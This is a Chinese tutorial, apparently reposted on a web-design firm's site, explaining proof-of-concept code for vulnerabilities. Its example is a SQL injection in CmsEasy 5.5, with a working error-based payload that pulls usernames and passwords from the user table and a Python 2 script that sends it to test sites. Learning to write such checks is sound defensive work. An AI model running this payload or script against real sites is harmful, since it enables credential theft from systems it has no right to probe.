python中poc指的是什么意思

小編給大家分享一下python中poc指的是什么意思,希望大家閱讀完這篇文章后大所收獲,下面讓我們一起去探討吧!

成都創(chuàng)新互聯公司是專業(yè)的安達網站建設公司,安達接單;提供網站設計、成都網站設計,網頁設計,網站設計,建網站,PHP網站建設等專業(yè)做網站服務;采用PHP框架,可快速的進行安達網站開發(fā)網頁制作和功能擴展;專業(yè)做搜索引擎喜愛的網站,專業(yè)的做網站團隊,希望更多企業(yè)前來合作!

0x00 我們需要掌握的幾個的概念

PoC(全稱:Proof of Concept)中文意思是“觀點證明”。在安全行業(yè)中PoC則是一段驗證漏洞的程序,使我們能夠確認這個漏洞是真實存在的。

Python,是一種面向對象、解釋型計算機程序設計語言。常見的一些庫我們需要了解,比如:urllib,urllib2,re,request,socket等,本文我們要使用Python這門語言,Python的基礎知識我們不做講解。

SQL Injection,通過把SQL命令插入到Web表單遞交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執(zhí)行惡意的SQL命令。

0x01 PoC編寫流程

場景還原:某網站托管公司,旗下托管了數萬個站點,負責這些站點的安全,但是突然某一天,某知名CMS程序被爆出存在一個高危的SQL注入,某網管排查后發(fā)現旗下托管網站中存在幾百個站點使用該CMS程序,那么一個一個去排查是否存在該漏洞是非常繁瑣的,所以,我們需要一個PoC來驗證下。

·根據該漏洞詳情的描述,假設已知出現漏洞的CMS版本號為4.1,可以去其官網或者GitHub上去下載相對應的版本。

·下載之后,模擬其服務器真實環(huán)境,本地進行搭建。根據漏洞描述,進行復現,已SQL注入為例,重復提交不同的參數,觀察不同的返回結果,同時注意如果該漏洞不存在出現的結果。

·根據漏洞復現的實際情況,進行PoC的編寫。

·PoC寫完之后需要進行相關的測試,已確保該PoC的編寫沒有問題,比如測試靶機程序,以及不存在漏洞的程序。

0x02 SQL Injection poc編寫

已知CmsEasy 5.5 UTF-8程序存在SQL注入,烏云漏洞中的漏洞細節(jié)比較詳細

(由于wooyun已經暫停訪問,故不上鏈接了)。

·首先,我們需要下載其相關源碼,進行本地搭建。

閱讀漏洞細節(jié),我們得知其url與payload如下:

URL:http://xxx.xxx/celive/live/header.php Payload:xajax=LiveMessage&xajaxargs[0]=name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)--%20

·漏洞復現:我們根據其漏洞描述,進行復現,該注入點需要發(fā)起一個Post請求,我們使用Firefox瀏覽器配合hackbar插件進行復現,填入url與payload,發(fā)送,獲取其賬戶密碼。

漏洞效果如下:

python中poc指的是什么意思這樣,我們的漏洞就已經復現成功了。接下來,我們來寫Poc。

#!/usr/bin/env python
# coding:utf-8
import urllib2
import urllib
import re
import sys
def verify(url):
target = '%s/celive/live/header.php' % url
#需要發(fā)送的數據
post_data = {
'xajax': 'LiveMessage',
'xajaxargs[0]': "name',(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(username,'|',password)) from cmseasy_user),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- " }
try:
#發(fā)送請求
req = urllib2.Request(target, data=urllib.urlencode(post_data))
response = urllib2.urlopen(req)
#處理請求,進行判斷
if response:
data = response.read()
if "XPATH syntax error" in data:
print "%s is vulnerable" % target
else:
print "%s is not vulnerable" % target

except Exception, e:
print "Something happend..."
print e
def main():
args = sys.argv
url = ""
if len(args) == 2:
url = args[1]
verify(url)
else:
print "Usage: python %s url" % (args[0])
if __name__ == '__main__':
main()

看完了這篇文章,相信你對python中poc指的是什么意思有了一定的了解,想了解更多相關知識,歡迎關注創(chuàng)新互聯行業(yè)資訊頻道,感謝各位的閱讀!

分享文章:python中poc指的是什么意思
網頁地址:http://bm7419.com/article26/ijhscg.html

成都網站建設公司_創(chuàng)新互聯,為您提供服務器托管外貿建站Google、網站制作、標簽優(yōu)化微信公眾號

廣告

聲明:本網站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯

小程序開發(fā)